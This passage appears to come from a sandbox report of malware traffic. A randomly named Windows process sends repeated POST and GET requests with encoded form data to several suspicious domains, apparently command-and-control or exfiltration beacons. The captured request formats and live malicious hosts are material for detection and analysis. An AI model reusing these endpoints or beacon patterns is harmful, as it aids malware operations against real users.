                                                                    Jan 10, 2025 09:12:13.634260893 CET | 814 | OUT | POST /t0rn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.explorevision.xyz
                                                                    Origin: http://www.explorevision.xyz
                                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 56 66 57 44 42 69 76 6c 73 70 52 73 6a 54 64 66 4d 57 77 6f 6a 30 72 2b 50 4c 4a 73 4a 6e 6c 4e 56 38 41 42 47 4a 35 64 71 74 6e 34 6d 7a 6c 78 6e 4e 72 58 2b 6e 74 58 41 6a 57 64 4c 36 78 31 4e 46 66 61 4f 30 52 68 68 51 4c 46 72 4a 6a 2b 32 39 6f 6d 53 52 52 35 79 50 70 58 76 7a 2f 5a 2f 44 37 6a 4a 4f 30 6f 4b 6e 56 50 41 65 46 43 4f 79 59 30 30 65 54 56 64 42 5a 46 45 72 32 61 4d 53 36 73 44 35 4b 33 77 54 35 34 49 2b 45 30 4f 67 58 72 64 33 6b 4f 4d 76 39 33 67 69 65 41 4b 53 77 66 61 46 4a 51 32 51 75 58 71 43 33 74 41 65 78 77 39 4e 6d 39 4b 2f 44 53 6f 64 4a 6a 36 4a 49 45 6f 30 47 74 79 66 35 79 32 48 45 46 71 4e 68 72 44 4e 64 6f 43 37 56 39 37 39 4f 33 4b 67 3d 3d
                                                                    Data Ascii: -0-L9xY=VfWDBivlspRsjTdfMWwoj0r+PLJsJnlNV8ABGJ5dqtn4mzlxnNrX+ntXAjWdL6x1NFfaO0RhhQLFrJj+29omSRR5yPpXvz/Z/D7jJO0oKnVPAeFCOyY00eTVdBZFEr2aMS6sD5K3wT54I+E0OgXrd3kOMv93gieAKSwfaFJQ2QuXqC3tAexw9Nm9K/DSodJj6JIEo0Gtyf5y2HEFqNhrDNdoC7V979O3Kg==
                                                                    Jan 10, 2025 09:12:14.211534023 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:14 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    15 | 192.168.2.6 | 49999 | 162.0.236.169 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:12:16.227170944 CET | 1827 | OUT | POST /t0rn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.explorevision.xyz
                                                                    Origin: http://www.explorevision.xyz
                                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Timestamp: Jan 10, 2025 09:12:16.804718018 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 08:12:16 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 16 | Source IP: 192.168.2.6 | Source Port: 50000 | Destination IP: 162.0.236.169 | Destination Port: 80 | PID: 6728 | Process: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
Timestamp: Jan 10, 2025 09:12:18.766303062 CET | Bytes transferred: 524 | Direction: OUT | Data: GET /t0rn/?Mn=PdO8wZnxGnZX&-0-L9xY=Yd+jCUH61c4a7Q1+Dkx6pQX3S61LKXAtFbIeY4NO2NPuq2cKreHL8mdEdFCyOqVBfEq7A2gNsBXq87HwyvEMJSNDnPhs3w+B9xX6N7MrbCFYPNclLBgQ9fjNZkREdMjUbQytONk= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.explorevision.xyz
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Timestamp: Jan 10, 2025 09:12:19.334186077 CET | Bytes transferred: 548 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 08:12:19 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 50001 | Destination IP: 192.186.58.31 | Destination Port: 80 | PID: 6728 | Process: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
Timestamp: Jan 10, 2025 09:12:24.897656918 CET | Bytes transferred: 778 | Direction: OUT | Data: POST /wn9b/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.babyzhibo.net
Origin: http://www.babyzhibo.net
Referer: http://www.babyzhibo.net/wn9b/
Cache-Control: no-cache
Content-Length: 212
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=iZAMmr5zjOmZB8AdRHgO1SZ57oHBnaGa0wUy8K3KOLoIbQc7tMY1KXySWsFjgOB9yDzrXpaHLdRx39BBISbesRKlcQv/O8Cg0bemiQI1Z6bGnJrxqTi+QGMJ7goszUpmJE5BYCL0tekvvydSBghV0BmF2pUm1LhId6AMCvQQPjYYo07zSrOmV2UrLQHSbr6/kyZ4SarAe0/I
Timestamp: Jan 10, 2025 09:12:25.801300049 CET | Bytes transferred: 190 | Direction: IN | Data: HTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 10 Jan 2025 08:12:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
Data Ascii: d404 Not Found0


Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 50002 | Destination IP: 192.186.58.31 | Destination Port: 80 | PID: 6728 | Process: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
Timestamp: Jan 10, 2025 09:12:27.439080954 CET | Bytes transferred: 802 | Direction: OUT | Data: POST /wn9b/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.babyzhibo.net
Origin: http://www.babyzhibo.net
Referer: http://www.babyzhibo.net/wn9b/
Cache-Control: no-cache
Content-Length: 236
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=iZAMmr5zjOmZCcQdQlIO9SZ40IHBu6GW0woy8PPkP5MIbwM785s1G3ySZMFmkOB2yDuUXpmHLZ5x38RBLlvfsBKwRwv9TsCg0bemiQcPZ6DGg57xoyi/OWMI8gos3UpiJE53YGLOtbgvvytSPVBWvxmD4JVnz4kdZsZedNQARQonpCmpOYOFHm0pLSfgbL6Vmyh4ANnnRAarMGpCRZ/z7XI/Ksgh90UUHg==
Timestamp: Jan 10, 2025 09:12:28.345824957 CET | Bytes transferred: 190 | Direction: IN | Data: HTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 10 Jan 2025 08:12:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
Data Ascii: d404 Not Found0


Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 50003 | Destination IP: 192.186.58.31 | Destination Port: 80 | PID: 6728 | Process: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
Timestamp: Jan 10, 2025 09:12:29.985951900 CET | Bytes transferred: 1815 | Direction: OUT | Data: POST /wn9b/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.babyzhibo.net
Origin: http://www.babyzhibo.net
Referer: http://www.babyzhibo.net/wn9b/
Cache-Control: no-cache
Content-Length: 1248
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Timestamp: Jan 10, 2025 09:12:30.919533014 CET | Bytes transferred: 190 | Direction: IN | Data: HTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 10 Jan 2025 08:12:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
Data Ascii: d404 Not Found0


Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 50004 | Destination IP: 192.186.58.31 | Destination Port: 80 | PID: 6728 | Process: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
Timestamp: Jan 10, 2025 09:12:32.527190924 CET | Bytes transferred: 520 | Direction: OUT | Data: GET /wn9b/?-0-L9xY=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&Mn=PdO8wZnxGnZX HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.babyzhibo.net
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Timestamp: Jan 10, 2025 09:12:33.531900883 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 08:12:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>&#22303;&#35946;&#30452;&#25773;&#20813;&#36153;&#19979;&#36733;&#23433;&#35013;&#25163;&#26426;&#29256;</title><meta http-equiv="keywords" content="&#22303;&#35946;&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;&#22303;&#35946;&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,&#22303;&#35946;&#30452;&#25773;&#26368;&#26032;&#29256;&#26412;&#30452;&#25773;app&#21019;&#24314;&#20110;2005&#24180;&#26368;&#21021;&#21482;&#26159;&#19968;&#20010;&#23567;&#22411;&#30340;&#20307;&#32946;&#36164;&#35759;&#32593;&#31449;&#32463;&#36807;&#22810;&#24180;&#30340;&#21457;&#23637;&#22914;&#20170;&#24050;&#32463;&#25104;&#20026;&#20102;&#22269;&#20869;&#30693;&#21517;&#30340;&#20307;&#32946;&#36187;&#20107;&#25253;&#36947;&#23186;&#20307;&#30340;&#210 [TRUNCATED]


Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 50005 | Destination IP: 104.21.64.1 | Destination Port: 80 | PID: 6728 | Process: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
Timestamp: Jan 10, 2025 09:12:39.680250883 CET | Bytes transferred: 775 | Direction: OUT | Data: POST /utww/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.mzkd6gp5.top
Origin: http://www.mzkd6gp5.top
Referer: http://www.mzkd6gp5.top/utww/
Cache-Control: no-cache
Content-Length: 212
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=gn7QfkN0RCNMuyWFId6FlOlLJRugQnEq62SwjVsOzB9I77z6/zXYo1dw2C89MoE+31xlXQrdtX12dCw44J313K8KOLzm/HcOxF1zpc4inPxOEZRTIPci9Wl3ebqcBUhcLUL+bR2z5KfP6YhVfBve93WtiNBGz6m8ZRRraVMfd0QBbvUv73I2ILrXwcWOtvSyUPPnNIA7eE7f
Timestamp: Jan 10, 2025 09:12:40.582638025 CET | Bytes transferred: 968 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 08:12:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BkyB%2BECMl8AWZ6kVIFeZyjbCdF4ukGG6UKffVeZoKVwPDqz1y9pybc0iKI0P1WeopKgaThvfjkP0nKKXKWasXm1u06GXD%2B3PachlS4VmeIR8Ew76e4JIG0zzVp0RiLyGTzY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffb340e7f754414-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    22 | 192.168.2.6 | 50006 | 104.21.64.180 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:12:42.217037916 CET | 799 | OUT | POST /utww/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.mzkd6gp5.top
                                                                    Origin: http://www.mzkd6gp5.top
                                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=gn7QfkN0RCNM8CmFK+SF0+lIQhugL3Fh62ewjUoeyzZI7eP6+yXYt1dw5i8yCIEl310PXVrdtXh2dCA44+j22a8IGrzkiXcOxF1zpcEInPpOEphTOd1Qz2l2ZbqcXUhYLULcbTOZ5InP6clVfwvdy3WvstAG2L/rQgZrY0kldVMYeZJ1nEIVabLVweO8tPSYWP3nffMcRwe8gzflja09gtJyNIaDvKmwFQ==
                                                                    Jan 10, 2025 09:12:43.098784924 CET | 970 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:43 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8dOeIYWYRPqMd47IT8Z1o6QnbCukbPxs%2BQHGV7mHH0bdyKFeufT6ypuFc3fpPPQA4gW10RuSaN7c%2Bti9KbZpicDVLwvqHeGmA6lTVBQtDFvoNnQydf4%2F87Zi4%2BeOWVcjnu0"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb341e489042e9-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    23 | 192.168.2.6 | 50007 | 104.21.64.180 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:12:44.778053045 CET | 1812 | OUT | POST /utww/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.mzkd6gp5.top
                                                                    Origin: http://www.mzkd6gp5.top
                                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Ascii: -0-L9xY=gn7QfkN0RCNM8CmFK+SF0+lIQhugL3Fh62ewjUoeyzRI7LD6+R/Yq1dwwC8xCIF331MUXVWqtVZ2chI4oPj24a8IKLzp/HcXxBQ6pc0InPpOEr5TfPdQjGl3ebqQBUhkLQejbTKj64HP94BVYWTd73WphNAo2LCsQgUYY0gDdXQYee002AQ4PKOzpJufgreRYtjBU8BoTQaTl2Dh3YtCu/1cUPn1tZ7cZc1X2wGypo1WzbjL4fVTTl9JIx9cApjIKUCG8tSmgRThfq/xnaI/t79uPdQXeu5mHXKOuwTYbyU1vyXhsAPX3R2ygbFeBzLsUgwqTy0qdi4cmpd7aXiKiW3eG3AoaUZGYP7+w4WdpOTDOwlBzfpjrajgG1bZJAwCZ7ervVDsqkBl7CHW1sxgrNGAwV2d8W0KnxQ/Jh2X8RKaSiiHfCOjixpHJUHtxfvDXD6GlqBlKhI4q9ugUmX/4NHa7eMCUrdGDJR6gY9815bqPpKpPB2g6ThWBaqUaE5y3ZHcjBtb0+sp4m4wZJs8/5BlP06ToSp8/zlVnhGL1eChV2FugYykNtXbzl1GsJ/wa1H3nQoMQYKm1WtBqQJGwCoCbiqsOsvI4MQKTuQxuRmXgMsbFFDxiRkU463HWcWUNeV8gIbx9pccORwi3D8DCXyP8qh/vgyHv63LRRIvi1IWaqXSqG+bWiyKFiHMa8jvEMUicBDoXr9HP7Pg1L+Zy8TVdGyoMxJWr4pXwRU9DCrMGw0a/veYZvkeJXMfuCvFEpadyb5zR4uCEfWQi4YFdhPYfMFJxr+IZl0Y/+qVdh+qG1uto3LJFE3aumWqRSvrhM7Na1ximPZN4TsewlCKdTrfmXbuQt+qmoFOQDyLAESDgjclrfjaDzddE2ROrQO1co8Nw+LR/8nT+CpnrDGOFns0Yc7T+kyjEOAqre4wtiw0P6MBIObWZB0jisfso0p7kk5v1nFU83I0j5Yn+jUhEXFJpJ6kBm26nfWiU4dqp1op [TRUNCATED]
                                                                    Jan 10, 2025 09:12:45.679068089 CET | 977 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:45 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJDDB%2F2M9nEZ7cYFHW6mKb58ePa3bHBQj9SsEqrBXF8ufupJyX0aE6SnKnWj5gpW28FwvFrxtuAnThEc%2BBe0tniA4fnTXY4e%2FQkkukKd9UWcRdrQ62aziAG%2Bq9E%2FgR9%2F%2Bhsv"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb342e5b14c358-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1812&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    24 | 192.168.2.6 | 50008 | 104.21.64.180 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:12:47.325608015 CET | 519 | OUT | GET /utww/?-0-L9xY=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.mzkd6gp5.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:12:48.218502998 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:48 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fg%2Foqeh5PKJsRIbWbtuaHM5dHL9iQvDdgTx9fr5WM8AzcZhuNevVt8I%2FdajrOaxy44AXjoCw67pcZ%2FgAmCxJjR1wuhDl4hDeLelnBJakTyeEU8KwS%2BMXW8ptPJ0PV0YX%2FfwR"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb343e3d3f42e9-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1680&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=519&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frien
                                                                    Jan 10, 2025 09:12:48.218521118 CET | 94 | IN | Data Ascii: dly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    25 | 192.168.2.6 | 50011 | 76.223.67.189 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:13:09.844005108 CET | 775 | OUT | POST /s1ai/ HTTP/1.1
